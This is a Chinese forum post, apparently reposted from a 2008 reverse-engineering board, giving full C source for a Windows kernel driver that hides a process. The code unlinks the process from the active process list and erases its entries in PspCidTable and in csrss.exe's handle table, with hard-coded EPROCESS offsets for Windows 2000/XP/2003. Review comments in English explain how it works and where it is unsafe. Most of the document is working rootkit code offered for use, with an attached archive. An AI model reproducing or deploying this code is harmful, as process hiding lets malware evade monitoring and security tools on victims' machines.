

科普之三招隱藏進程

Posted on 2009-10-30 00:10 S.l.e!ep.¢% 閱讀(467) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
【原創】科普之三招隱藏進程

標 題: 【原創】科普之三招隱藏進程
作 者: cooldiyer
時 間: 2008-09-20,11:58
鏈 接: http://bbs.pediy.com/showthread.php?t=73129

先從活動進程鏈表中摘除，擦除PspCidTable中對應的Object，再擦除Csrss進程中那份表
擦除HandleTable表用了一些技巧,不用親自操作三層表,不是網上流傳的方法,具體請看代碼......

使用的時候直接HideProcessById(HIDE_PID)就行了
偶這只菜鳥的學習總結,牛們不要BS,我會超過你們的.很快

ProcessHide.h
代碼:
#ifndef?__PROCESSHIDE_H__
#define?__PROCESSHIDE_H__

#ifdef?__cplusplus
extern?"C"?{
#endif

#include?<ntddk.h>

/*
 使用之前請先調用InitializeCommonVariables初始化全局變量
*/

// Private layout of one handle-table entry as this file expects it.  ntddk.h
// does not expose it, so it is reproduced here (the field comments below are
// the kernel's own).  Only the Object/ObAttributes word is ever touched by
// this code (EraseObjectFromHandleTable writes NULL into it); the remaining
// members are carried so the entry size matches what ExEnumHandleTable hands
// to the callback.
// NOTE(review): the layout is not versioned here and is assumed to match the
// NT 5.x kernels InitializeCommonVariables supports -- confirm per target.
typedef struct _HANDLE_TABLE_ENTRY {

    //
    //  The pointer to the object overloaded with three ob attributes bits in
    //  the lower order and the high bit to denote locked or unlocked entries
    //

    union {

        PVOID Object;

        ULONG ObAttributes;
    };

    //
    //  This field either contains the granted access mask for the handle or an
    //  ob variation that also stores the same information.  Or in the case of
    //  a free entry the field stores the index for the next free entry in the
    //  free list.  This is like a FAT chain, and is used instead of pointers
    //  to make table duplication easier, because the entries can just be
    //  copied without needing to modify pointers.
    //

    union {

        union {

            ACCESS_MASK GrantedAccess;

            struct {

                USHORT GrantedAccessIndex;
                USHORT CreatorBackTraceIndex;
            };
        };

        LONG NextFreeTableEntry;
    };

} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;

// Private layout of a handle table (kernel field comments retained).  This
// file never reads these members directly: a table pointer is obtained either
// by GetPspCidTable or by reading a process's EPROCESS, and is handed to the
// kernel's ExEnumHandleTable, which walks the multi-level Table tree itself
// (the "three-level table" the post says it avoids handling by hand).
// NOTE(review): layout assumed to match the NT 5.x targets -- confirm.
typedef struct _HANDLE_TABLE {

    //
    //  A set of flags used to denote the state or attributes of this
    //  particular handle table
    //

    ULONG Flags;

    //
    //  The number of handle table entries in use.
    //

    LONG HandleCount;

    //
    //  A pointer to the top level handle table tree node.
    //

    PHANDLE_TABLE_ENTRY **Table;

    //
    //  The process who is being charged quota for this handle table and a
    //  unique process id to use in our callbacks
    //

    struct _EPROCESS *QuotaProcess;
    HANDLE UniqueProcessId;

    //
    //  This is a singly linked list of free table entries.  We don't actually
    //  use pointers, but have each store the index of the next free entry
    //  in the list.  The list is managed as a lifo list.  We also keep track
    //  of the next index that we have to allocate pool to hold.
    //

    LONG FirstFreeTableEntry;
    LONG NextIndexNeedingPool;

    //
    //  This is the lock used to protect the fields in the record, and the
    //  handle table tree in general.  Individual handle table entries that are
    //  not free have their own lock
    //

    ERESOURCE HandleTableLock;

    //
    //  The list of global handle tables.  This field is protected by a global
    //  lock.
    //

    LIST_ENTRY HandleTableList;

    //
    //  The following field is used to loosely synchronize thread contention
    //  on a handle.  If a thread wants to wait for a handle to be unlocked
    //  it will wait on this event with a short timeout.  Any handle unlock
    //  operation will pulse this event if there are threads waiting on it
    //

    KEVENT HandleContentionEvent;
} HANDLE_TABLE, *PHANDLE_TABLE;

// Signature of the per-entry callback invoked by ExEnumHandleTable
// (implemented in this file by EnumHandleCallback).  This file relies on a
// TRUE return stopping the walk and making ExEnumHandleTable itself return
// TRUE; the matched entry is then reported back through EnumParameter.
typedef BOOLEAN (*EX_ENUMERATE_HANDLE_ROUTINE)(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN PVOID EnumParameter
  );

// Pointer type for the exported but undocumented ExEnumHandleTable, which is
// resolved by name at run time with MmGetSystemRoutineAddress rather than
// linked.  The OUT Handle parameter is not used by this file (NULL is passed).
// NOTE(review): a name beginning with two underscores is reserved for the
// implementation in C; it compiles here but is not portable style.
typedef BOOLEAN (*__ExEnumHandleTable)(
  IN PHANDLE_TABLE HandleTable,
  IN EX_ENUMERATE_HANDLE_ROUTINE EnumHandleProcedure,
  IN PVOID EnumParameter,
  OUT PHANDLE Handle OPTIONAL
  );

// Locate PspCidTable by pattern-scanning the code of PsLookupProcessByProcessId
// (see the definition for the byte pattern).  Writes *ppPspCidTable only on
// STATUS_SUCCESS; STATUS_NOT_FOUND if the pattern is absent from the first
// page of the routine.
NTSTATUS
GetPspCidTable(
  OUT PHANDLE_TABLE* ppPspCidTable
  );

// ExEnumHandleTable callback.  EnumParameter points at the HANDLE to find on
// entry and is overwritten with the PHANDLE_TABLE_ENTRY on a match (TRUE).
BOOLEAN
EnumHandleCallback(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN OUT PVOID EnumParameter
  );

// NULL the Object word of the entry for ProcessId in pHandleTable; the entry
// itself stays in the table.  STATUS_NOT_FOUND if ExEnumHandleTable cannot be
// resolved or no entry matches.
NTSTATUS
EraseObjectFromHandleTable(
  PHANDLE_TABLE pHandleTable,
  IN HANDLE ProcessId
  );

// Unlink the EPROCESS of ProcessId from the active process list by rewriting
// its two neighbours (no lock is taken).  Returns the status of
// PsLookupProcessByProcessId.
NTSTATUS
RemoveNodeFromActiveProcessLinks(
  IN HANDLE ProcessId
  );

// Apply the three steps above to ProcessId: unlink, clear the PspCidTable
// entry, clear the entry in CSRSS.EXE's handle table.  Calls
// InitializeCommonVariables itself if the offsets are still 0.  Only the last
// step's status is returned.
NTSTATUS
HideProcessById(
  IN HANDLE ProcessId
  );

// Fill the g_Offset_Eprocess_* globals and g_pEprocess_System for the running
// NT 5.0/5.1/5.2 kernel; must run in the System process (DriverEntry).
NTSTATUS
InitializeCommonVariables(
  );

// Scan the current EPROCESS for the bytes "System" to find the image-name
// offset.  Offset must be a valid pointer despite OPTIONAL.
NTSTATUS
GetProcessNameOffset(
  OUT PULONG  Offset OPTIONAL
  );

// Walk the active process list from g_pEprocess_System and return the first
// EPROCESS whose image name matches pcProcessName (case-insensitive prefix
// match).  No reference is taken on *Process.
NTSTATUS
LookupProcessByName(
  IN PCHAR pcProcessName,
  OUT PEPROCESS *Process
  );
#ifdef?__cplusplus
}?//?extern?"C"
#endif

#endif?//?__PROCESSHIDE_H__
ProcessHide.c
代碼:
#include?"ProcessHide.h"
#include?"LDasm.h"

// Byte offsets into EPROCESS.  All are 0 until InitializeCommonVariables
// fills them (HideProcessById treats g_Offset_Eprocess_HandleTable == 0 as
// "not initialized").  They are integers, so the NULL initializer is really
// 0; three come from a per-version table and the image-name offset from a
// run-time scan.  A 32-bit layout is assumed throughout (pointers are cast
// to ULONG).
ULONG    g_Offset_Eprocess_Name = NULL;          // image name (found by GetProcessNameOffset)
ULONG    g_Offset_Eprocess_Flink = NULL;         // LIST_ENTRY of the active process list
ULONG    g_Offset_Eprocess_ProcessId = NULL;     // unique process id
ULONG    g_Offset_Eprocess_HandleTable = NULL;   // pointer to the process handle table

// Raw EPROCESS pointer of the process InitializeCommonVariables ran in
// (expected to be System); starting node for LookupProcessByName.
PEPROCESS  g_pEprocess_System = NULL;


NTSTATUS
GetPspCidTable(
  OUT PHANDLE_TABLE* ppPspCidTable
  )
  /*
  Locate PspCidTable by scanning the code of PsLookupProcessByProcessId
  (translated from the author's note).

  The exported routine is resolved through MmGetSystemRoutineAddress and its
  first page is walked one instruction at a time, with instruction lengths
  from SizeOfCode in LDasm.c (not in view).  The first instruction whose
  leading bytes are FF 35 (push dword ptr [imm32]) and whose successor at
  +6 starts with E8 (call rel32) is taken to be "push [PspCidTable]; call":
  the imm32 at +2 is the address of the table-pointer global, which is
  dereferenced once to obtain the PHANDLE_TABLE.

  ppPspCidTable - receives the table pointer; written only on success.
  Returns STATUS_SUCCESS when the pattern was found within PAGE_SIZE bytes,
  STATUS_NOT_FOUND otherwise.

  NOTE(review): the MmGetSystemRoutineAddress result is not checked for NULL,
  and the pattern is tied to one compiled form of the routine, so on a kernel
  build it was not written against the scan can read from a bad address or
  match the wrong instruction.  The local variable PsLookupProcessByProcessId
  shadows the kernel routine of the same name used elsewhere in this file.
  */
{
  NTSTATUS    status;
  PUCHAR      cPtr;
  unsigned char * pOpcode;          // opcode pointer reported by SizeOfCode for cPtr (presumably cPtr past any prefix bytes -- LDasm not in view)
  ULONG      Length;                // byte length of the instruction at cPtr
  UNICODE_STRING  uniPsLookup;
  ULONG      PsLookupProcessByProcessId;   // routine address held as an integer (32-bit build)

  status = STATUS_NOT_FOUND;

  RtlInitUnicodeString(&uniPsLookup, L"PsLookupProcessByProcessId");
  PsLookupProcessByProcessId = MmGetSystemRoutineAddress(&uniPsLookup); // MmGetSystemRoutineAddress resolves an exported routine by name

  // Walk at most one page of code, instruction by instruction.
  for (cPtr = (PUCHAR)PsLookupProcessByProcessId;
    cPtr < (PUCHAR)PsLookupProcessByProcessId + PAGE_SIZE;
    cPtr += Length)
  {
    Length = SizeOfCode(cPtr, &pOpcode);    //credit to LDasm.c by Ms-Rem
    if (!Length) break;                      // undecodable byte: stop rather than loop with a zero step
    // 0x35FF read little-endian is the byte sequence FF 35 (push dword ptr [imm32]);
    // a 6-byte push followed by E8 is the "push [global]; call" shape being matched.
    if (*(PUSHORT)cPtr == 0x35FF && *(pOpcode + 6) == 0xE8)
    {
      // pOpcode + 2 holds the imm32 (address of the table-pointer global);
      // the second dereference yields the table itself.
      *ppPspCidTable = **(PVOID **)(pOpcode + 2);
      status = STATUS_SUCCESS;
      break;
    }
  }
  return status;
}

BOOLEAN
EnumHandleCallback(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN OUT PVOID EnumParameter
  )
  /*
  ExEnumHandleTable callback used by EraseObjectFromHandleTable.

  EnumParameter is overloaded: on entry it points to the HANDLE value being
  searched for; when that handle is reached the same slot is overwritten with
  the PHANDLE_TABLE_ENTRY so the caller can act on the entry after the walk
  (the entry is deliberately not modified here).  Returns TRUE on the match,
  which this file relies on to stop the enumeration, and FALSE otherwise.
  A NULL EnumParameter never matches.
  */
{
  // Compare against the handle the caller stored in *EnumParameter.
  if (ARGUMENT_PRESENT(EnumParameter) && *(HANDLE *)EnumParameter == Handle)
  {
    // Hand the entry back through the same in/out slot.
    *(PHANDLE_TABLE_ENTRY *)EnumParameter = HandleTableEntry;
    return TRUE;
  }
  return FALSE;
}

// Modified so that the ID to erase is passed in as a parameter.
//
// Find the entry for ProcessId in pHandleTable and NULL its Object word.
// The walk is done by the kernel's ExEnumHandleTable (resolved by name at run
// time; this file only declares the __ExEnumHandleTable pointer type) with
// EnumHandleCallback, and the write happens after the walk returns because,
// per the author's note, the entry cannot be erased from inside the callback.
//
// pHandleTable - table to search (the callers pass PspCidTable and the
//                CSRSS.EXE process handle table).
// ProcessId    - handle value to look for.
// Returns STATUS_SUCCESS when an entry was found and cleared; STATUS_NOT_FOUND
// when ExEnumHandleTable could not be resolved or no entry matched.
//
// NOTE(review): only the Object/ObAttributes word is zeroed; the entry is not
// released to the free list and HandleCount is unchanged, so the table keeps
// an allocated entry whose object pointer is NULL.  Writing NULL also clears
// the attribute/lock bits the struct comment says share that word.
NTSTATUS
EraseObjectFromHandleTable(
  PHANDLE_TABLE pHandleTable,
  IN HANDLE ProcessId
  )
{
  NTSTATUS    status;

  PVOID      EnumParameter;      // in: the handle to find; out: the matching PHANDLE_TABLE_ENTRY
  UNICODE_STRING  uniExEnumHandleTable;

  __ExEnumHandleTable  ExEnumHandleTable;

  status = STATUS_NOT_FOUND;
  EnumParameter = ProcessId;


  RtlInitUnicodeString(&uniExEnumHandleTable, L"ExEnumHandleTable");
  ExEnumHandleTable = MmGetSystemRoutineAddress(&uniExEnumHandleTable);

  if (NULL == ExEnumHandleTable)
  {
    return STATUS_NOT_FOUND;
  }

  // Erase after the enumeration; erasing inside the callback is not possible.
  // A TRUE result means the callback matched and EnumParameter now holds the entry.
  if (ExEnumHandleTable(pHandleTable, EnumHandleCallback, &EnumParameter, NULL))
  {
    InterlockedExchangePointer(&((PHANDLE_TABLE_ENTRY)EnumParameter)->Object, NULL);
    status = STATUS_SUCCESS;
  }

  return status;
}

NTSTATUS
RemoveNodeFromActiveProcessLinks(
  IN HANDLE ProcessId
  )
  /*
  Unlink the EPROCESS of ProcessId from the doubly linked list reached through
  the LIST_ENTRY at g_Offset_Eprocess_Flink (the active process list).

  Only the two neighbours are rewritten to point past the node; the node's
  own Flink/Blink are left as they were and the EPROCESS itself stays
  allocated.  Returns the status of PsLookupProcessByProcessId, i.e.
  STATUS_SUCCESS once the lookup succeeded, whatever the list update did.

  NOTE(review): the reference returned by PsLookupProcessByProcessId is
  released before the pointer is used, and the list is modified without
  taking any lock, so this races with process teardown and with anything
  else walking the list.  Requires InitializeCommonVariables to have set
  g_Offset_Eprocess_Flink.
  */
{
  NTSTATUS  status;
  PLIST_ENTRY  pListEntry;
  PEPROCESS  pEprocess;

  status = PsLookupProcessByProcessId(ProcessId, &pEprocess);

  if (!NT_SUCCESS(status))
  {
    return status;
  }
  ObDereferenceObject(pEprocess);   // reference dropped here; pEprocess is used below as a raw pointer

  // Integer arithmetic assigned to a pointer without a cast (32-bit only).
  pListEntry = (ULONG)pEprocess + g_Offset_Eprocess_Flink;

  // Unlink from the list
  pListEntry->Blink->Flink = pListEntry->Flink;
  pListEntry->Flink->Blink = pListEntry->Blink;

  return status;
}


NTSTATUS
HideProcessById(
  IN HANDLE ProcessId
  )
  /*
  Entry point of the post: apply the three removals to ProcessId in order.

    1. unlink its EPROCESS from the active process list
       (RemoveNodeFromActiveProcessLinks);
    2. NULL its entry in PspCidTable (EraseObjectFromHandleTable);
    3. NULL the matching entry in the handle table of the CSRSS.EXE process,
       whose table pointer is read from that EPROCESS at
       g_Offset_Eprocess_HandleTable.

  Lazily runs InitializeCommonVariables when g_Offset_Eprocess_HandleTable is
  still 0.  Returns early with the failing status if initialization,
  GetPspCidTable or the CSRSS.EXE lookup fails.

  NOTE(review): the statuses of steps 1 and 2 are overwritten unchecked, so
  only step 3's result is returned and the steps are not transactional -- a
  failure part-way leaves a partially altered state.  None of the steps frees
  or otherwise changes the process object: each removes one lookup path to an
  EPROCESS that remains in memory, which is exactly the inconsistency that
  cross-checking these views against each other reveals.  pCsrssEprocess is a
  raw pointer from LookupProcessByName with no reference taken on it.
  */
{
  NTSTATUS    status;
  PHANDLE_TABLE  pPspCidTable;
  PEPROCESS    pCsrssEprocess = NULL;


  // Lazy initialization: a zero handle-table offset means the globals are unset.
  if (NULL == g_Offset_Eprocess_HandleTable)
  {
    status = InitializeCommonVariables();
    if (!NT_SUCCESS(status))
    {
      return status;
    }
  }

  status = GetPspCidTable(&pPspCidTable);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  // The trailing "\0" is redundant: the literal is already NUL-terminated.
  status = LookupProcessByName("CSRSS.EXE\0", &pCsrssEprocess);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  // Step 1: unlink from the active process list (status not checked)
  status = RemoveNodeFromActiveProcessLinks(ProcessId);


  // Step 2: erase the matching Object in PspCidTable (status not checked)
  status = EraseObjectFromHandleTable(pPspCidTable, ProcessId);


  // Step 3: erase the copy in the Csrss process's handle table.  The table
  // pointer is read as a ULONG from the csrss EPROCESS and passed where a
  // PHANDLE_TABLE is expected (implicit integer-to-pointer conversion).
  status = EraseObjectFromHandleTable(*(PULONG)((ULONG)pCsrssEprocess + g_Offset_Eprocess_HandleTable), ProcessId);


  return status;
}

NTSTATUS
LookupProcessByName(
  IN PCHAR pcProcessName,
  OUT PEPROCESS *pEprocess
  )
  /*
  Walk the active process list, starting at g_pEprocess_System, and return the
  first EPROCESS whose image name (at g_Offset_Eprocess_Name) matches
  pcProcessName.

  The comparison is _strnicmp over strlen(pcProcessName) characters, so it is
  case-insensitive and a prefix match ("csrss" would also match "csrss.exe").
  The walk stops when the starting process id is seen again after at least one
  hop (uCount >= 1), i.e. after one full cycle of the circular list.

  pcProcessName - NUL-terminated name to look for; must not be NULL.
  pEprocess     - receives the raw EPROCESS pointer (no reference is taken),
                  or NULL when nothing matched.
  Returns STATUS_INVALID_PARAMETER for a NULL argument, STATUS_SUCCESS on a
  match, STATUS_NOT_FOUND after a full cycle without one.

  NOTE(review): g_pEprocess_System and the offsets must already be set by
  InitializeCommonVariables; with them still 0 the first read below uses a
  NULL base.  The "(ULONG)lvalue = ..." assignments rely on a Microsoft
  compiler extension (casts as lvalues); 32-bit only.
  */
{
  NTSTATUS  status;
  ULONG    uCurrentProcessId = 0;
  ULONG    uStartProcessId = 0;
  ULONG    uCount = 0;            // hops taken; keeps the cycle check from firing on the start node
  ULONG    uLength = 0;           // strlen(pcProcessName): number of characters compared
  PLIST_ENTRY  pListActiveProcess;
  PEPROCESS  pCurrentEprocess = NULL;


  if (!ARGUMENT_PRESENT(pcProcessName) || !ARGUMENT_PRESENT(pEprocess))
  {
    return STATUS_INVALID_PARAMETER;
  }

  uLength = strlen(pcProcessName);

  pCurrentEprocess = g_pEprocess_System;

  // Remember the starting process id so a full cycle of the list can be detected.
  uStartProcessId = *((PULONG)((ULONG)pCurrentEprocess + g_Offset_Eprocess_ProcessId));

  uCurrentProcessId = uStartProcessId;

  while(1)
  {
    // Case-insensitive comparison of only the first uLength characters (prefix match).
    if(_strnicmp(pcProcessName, (PVOID)((ULONG)pCurrentEprocess + g_Offset_Eprocess_Name), uLength) == 0)
    {
      *pEprocess = pCurrentEprocess;
      status = STATUS_SUCCESS;
      break;
    }
    else if ((uCount >= 1) && (uStartProcessId == uCurrentProcessId))
    {
      // Back at the starting process after at least one hop: full cycle, no match.
      *pEprocess = 0x00000000;
      status = STATUS_NOT_FOUND;
      break;
    }
    else
    {
      // Advance: LIST_ENTRY at the Flink offset -> next entry -> subtract the
      // offset again to get back to the containing EPROCESS.
      pListActiveProcess = (LIST_ENTRY *)((ULONG)pCurrentEprocess + g_Offset_Eprocess_Flink);
      (ULONG)pCurrentEprocess = (ULONG)pListActiveProcess->Flink;
      (ULONG)pCurrentEprocess = (ULONG)pCurrentEprocess - g_Offset_Eprocess_Flink;
      uCurrentProcessId = *(PULONG)((ULONG)pCurrentEprocess + g_Offset_Eprocess_ProcessId);
      uCount++;
    }
  }
  return status;
}

NTSTATUS
GetProcessNameOffset(
  OUT PULONG  Offset OPTIONAL
  )
  /*
  Call from DriverEntry (translated from the author's note).

  Determines the byte offset of the image-name field inside EPROCESS by
  scanning the current process's EPROCESS for the bytes "System".  This only
  works where the current process is the System process, which is what the
  DriverEntry requirement provides (InitializeCommonVariables records
  PsGetCurrentProcess() as g_pEprocess_System on the same assumption).

  Offset - receives the offset of the first match.  Despite OPTIONAL it must
           be a valid pointer: NULL fails the MmIsAddressValid check and
           yields STATUS_INVALID_PARAMETER.
  Returns STATUS_SUCCESS when "System" was found within 3 * PAGE_SIZE bytes.

  NOTE(review): status is never initialized on the not-found path, so the
  function returns an indeterminate value if the scan finds nothing.  The
  scan is a 6-byte strncmp with no terminator check, so any "System..." run
  matches, and it reads 12 KB from the EPROCESS start regardless of the
  structure's real size (the original comment below acknowledges this).
  */
{
  NTSTATUS  status;
  PEPROCESS  curproc;
  ULONG      i;

  if (!MmIsAddressValid((PVOID)Offset))
  {
    status = STATUS_INVALID_PARAMETER;
    return status;
  }

  curproc = PsGetCurrentProcess();

  //
  // Then search the KPEB to get the offset of ProcessName relative to the KPEB.
  // At offset 174h is the process's short file name; it is used in few places,
  // e.g. SoftICE's addr and proc commands, and names over 16 characters are
  // simply truncated.

  // Scan for 12KB, hoping the KPEB never grows that big!
  //
  for( i = 0; i < 3 * PAGE_SIZE; i++ ) {

    if(!strncmp( "System", (PCHAR) curproc + i, strlen("System"))) {
      *Offset = i;
      status = STATUS_SUCCESS;
      break;
    }
  }
  return status;
}

NTSTATUS
InitializeCommonVariables(
  )
  /*
  Fill the g_Offset_Eprocess_* globals and g_pEprocess_System for the running
  kernel.

  The image-name offset is located at run time (GetProcessNameOffset); the
  process-id, active-list and handle-table offsets are hard-coded per NT
  version from PsGetVersion: 5.0, 5.1 and 5.2 (Windows 2000 / XP / Server
  2003) are handled, 4.0 is explicitly refused with STATUS_UNSUCCESSFUL.

  Must run in the System process context (it records PsGetCurrentProcess() as
  g_pEprocess_System; see GetProcessNameOffset).  Called from DriverEntry per
  the header comment, or lazily by HideProcessById.

  NOTE(review): any other major/minor pair falls through to STATUS_SUCCESS
  with the three hard-coded offsets still 0, so later callers compute
  addresses at offset 0 into EPROCESS.  The 5.1 and 5.2 branches set
  identical values.
  */
{
  NTSTATUS  status;
  ULONG  uMajorVersion;
  ULONG  uMinorVersion;

  status = GetProcessNameOffset(&g_Offset_Eprocess_Name);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  g_pEprocess_System = PsGetCurrentProcess();  // assumes the caller runs in the System process

  PsGetVersion(&uMajorVersion, &uMinorVersion, NULL, NULL);

  if (uMajorVersion == 4 && uMinorVersion == 0)
  {
    g_Offset_Eprocess_Flink = 152;
    // Stop supporting NT 4.0
    return STATUS_UNSUCCESSFUL;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 0)
  {
    // NT 5.0 (Windows 2000)
    g_Offset_Eprocess_ProcessId = 156;
    g_Offset_Eprocess_Flink = 160;
    g_Offset_Eprocess_HandleTable = 0x128;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 1)
  {
    // NT 5.1 (Windows XP)
    g_Offset_Eprocess_ProcessId = 132;
    g_Offset_Eprocess_Flink = 136;
    g_Offset_Eprocess_HandleTable = 0xC4;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 2)
  {
    // NT 5.2 (Windows Server 2003) -- same values as 5.1
    g_Offset_Eprocess_ProcessId = 132;
    g_Offset_Eprocess_Flink = 136;
    g_Offset_Eprocess_HandleTable = 0xC4;
  }

  return STATUS_SUCCESS;
}

上傳的附件
文件類型: rar ProcessHide.rar (6.1 KB, 465 次下載) [誰下載?]